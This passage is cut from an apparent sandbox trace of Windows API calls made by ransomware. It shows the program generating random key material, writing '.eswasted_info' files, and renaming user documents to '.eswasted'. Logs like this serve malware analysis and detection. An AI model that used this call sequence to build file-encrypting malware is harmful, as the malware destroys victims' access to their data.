HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0076.058] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.058] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x74e6 [0076.058] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74e6) returned 0x330000 [0076.058] CloseHandle (hObject=0x130) returned 1 [0076.063] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0076.064] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.064] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.064] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0076.065] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.065] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.076] SetEndOfFile (hFile=0x108) returned 1 [0076.079] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.079] CloseHandle (hObject=0x108) returned 1 [0076.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7226b0 | out: hHeap=0x6d0000) returned 1 [0076.082] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0076.083] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.083] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\LGY4pay4JvdTzyt.xls") returned 110 [0076.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e6) returned 0x70c160 [0076.083] lstrcpyW (in: lpString1=0x70c23c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.083] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0076.084] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.084] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\LGY4pay4JvdTzyt.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\99nhfhq2p47bcciqzu\\lgy4pay4jvdtzyt.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.085] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.133] SetEndOfFile (hFile=0x108) returned 1 [0076.134] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.134] lstrcpyW (in: lpString1=0x70c23c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\LGY4pay4JvdTzyt.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\99nhfhq2p47bcciqzu\\lgy4pay4jvdtzyt.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\LGY4pay4JvdTzyt.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\99nhfhq2p47bcciqzu\\lgy4pay4jvdtzyt.xls.eswasted")) returned 1 [0076.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\LGY4pay4JvdTzyt.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\99nhfhq2p47bcciqzu\\lgy4pay4jvdtzyt.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0076.182] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.182] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x16a4c [0076.182] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16a4c) returned 0x330000 [0076.182] CloseHandle (hObject=0x10c) returned 1 [0076.187] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0076.188] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.188] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.188] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0076.189] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.189] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.197] SetEndOfFile (hFile=0x108) returned 1 [0076.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.199] CloseHandle (hObject=0x108) returned 1 [0076.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0076.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722b08 | out: hHeap=0x6d0000) returned 1 [0076.201] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0076.201] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.201] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\JKuAschREk0B YjJ.odp") returned 72 [0076.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29a) returned 0x6f5cc0 [0076.202] lstrcpyW (in: lpString1=0x6f5d50, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.202] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0076.202] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.202] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\JKuAschREk0B YjJ.odp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\jkuaschrek0b yjj.odp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.203] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.204] SetEndOfFile (hFile=0x108) returned 1 [0076.204] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.204] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.204] lstrcpyW (in: lpString1=0x6f5d50, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\JKuAschREk0B YjJ.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\jkuaschrek0b yjj.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\JKuAschREk0B YjJ.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\jkuaschrek0b yjj.odp.eswasted")) returned 1 [0076.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\JKuAschREk0B YjJ.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\jkuaschrek0b yjj.odp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.205] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0076.205] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x205b [0076.205] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x205b) returned 0x330000 [0076.205] CloseHandle (hObject=0x11c) returned 1 [0076.207] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0076.207] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.207] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.208] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0076.208] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.208] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.217] SetEndOfFile (hFile=0x108) returned 1 [0076.219] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.219] CloseHandle (hObject=0x108) returned 1 [0076.220] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722e70 | out: hHeap=0x6d0000) returned 1 [0076.221] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0076.221] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.221] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\5fbB JQLqrComSEd7X.docx") returned 87 [0076.221] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b8) returned 0x6f6880 [0076.222] lstrcpyW (in: lpString1=0x6f692e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.222] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.222] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0076.222] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.222] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\5fbB JQLqrComSEd7X.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\5fbb jqlqrcomsed7x.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.223] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.224] SetEndOfFile (hFile=0x108) returned 1 [0076.224] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.224] lstrcpyW (in: lpString1=0x6f692e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\5fbB JQLqrComSEd7X.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\5fbb jqlqrcomsed7x.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\5fbB JQLqrComSEd7X.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\5fbb jqlqrcomsed7x.docx.eswasted")) returned 1 [0076.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\5fbB JQLqrComSEd7X.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\5fbb jqlqrcomsed7x.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0076.225] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.225] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x69f0 [0076.225] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x69f0) returned 0x330000 [0076.225] CloseHandle (hObject=0x10c) returned 1 [0076.719] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0076.720] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0076.720] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.720] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0076.721] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.721] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.729] SetEndOfFile (hFile=0x108) returned 1 [0076.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.731] CloseHandle (hObject=0x108) returned 1 [0076.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0076.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ff80 | out: hHeap=0x6d0000) returned 1 [0076.733] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0076.734] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.734] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\gUVXA_U.csv") returned 75 [0076.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a0) returned 0x6f5cc0 [0076.734] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.734] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0076.735] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.735] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\gUVXA_U.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\guvxa_u.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.735] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.736] SetEndOfFile (hFile=0x108) returned 1 [0076.737] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.737] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.737] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\gUVXA_U.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\guvxa_u.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\gUVXA_U.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\guvxa_u.csv.eswasted")) returned 1 [0076.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\gUVXA_U.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\guvxa_u.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.737] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0076.738] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xf01a [0076.738] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf01a) returned 0x330000 [0076.738] CloseHandle (hObject=0x11c) returned 1 [0076.741] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0076.742] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0076.742] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.742] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0076.743] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0076.743] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.752] SetEndOfFile (hFile=0x108) returned 1 [0076.754] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.754] CloseHandle (hObject=0x108) returned 1 [0076.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720188 | out: hHeap=0x6d0000) returned 1 [0076.850] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0076.851] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0076.851] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\_DFAUOuqJr3pbSoWNE3.csv") returned 75 [0076.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a0) returned 0x6f5cc0 [0076.852] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.852] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0076.853] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.853] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0076.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\_DFAUOuqJr3pbSoWNE3.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\_dfauouqjr3pbsowne3.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0076.853] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.854] SetEndOfFile (hFile=0x108) returned 1 [0076.855] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.855] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\_DFAUOuqJr3pbSoWNE3.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\_dfauouqjr3pbsowne3.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\_DFAUOuqJr3pbSoWNE3.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\_dfauouqjr3pbsowne3.csv.eswasted")) returned 1 [0076.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 